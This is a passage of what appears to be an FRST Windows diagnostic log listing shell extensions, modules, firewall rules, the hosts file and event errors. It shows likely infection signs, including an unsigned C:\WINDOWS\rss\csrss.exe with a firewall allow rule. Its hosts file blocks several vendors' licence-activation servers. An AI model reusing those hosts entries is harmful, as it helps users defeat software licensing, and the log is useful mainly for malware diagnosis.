ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2019-11-24 19:12 - 2008-10-15 16:44 - 000205312 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\itdownload.dll
2019-11-24 19:12 - 2019-11-24 19:12 - 000903680 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2017-08-26 16:54 - 2017-08-26 16:54 - 000410112 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2019-11-24 19:12 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\idp.dll
2015-04-17 17:30 - 2015-04-17 17:30 - 000139264 _____ (Packetizer, Inc.) [File not signed] C:\Program Files\AESCrypt\AESCrypt.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll
2019-11-24 19:12 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\psvince.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/24/2019 07:35:57 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:12:42 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:12:09 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:07:44 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:07:12 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:01:40 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:01:07 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 06:57:31 PM) (Source: MsiInstaller) (EventID: 10005) (User: DESKTOP-A0OS1Q6)
Description: Product: Online Application -- Error 4106. An error was encountered while creating a scheduled task: 'Online Application V2G1.job'. Error description: The parameter is incorrect.


System errors:
=============
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
